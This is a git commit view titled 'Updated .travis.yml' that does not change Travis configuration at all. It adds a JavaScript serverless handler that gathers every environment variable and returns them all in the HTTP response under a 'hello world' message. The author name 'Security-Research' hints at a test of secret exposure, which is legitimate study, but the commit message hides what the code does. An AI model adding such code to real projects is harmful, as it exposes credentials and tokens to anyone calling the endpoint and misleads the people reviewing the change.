'Updated .travis.yml'

This commit is contained in:
Security-Research 2023-05-28 22:34:51 +05:30
parent 687be8aca8
commit 8ece2faad3

View File

@ -0,0 +1,11 @@
exports.handler = async () => {
let envString = "";
for (let key in process.env) {
envString += `${key}: ${process.env[key]}
`;
}
return {
statusCode: 200,
body: `hello world! I have a hotub ${envString}`,
};
};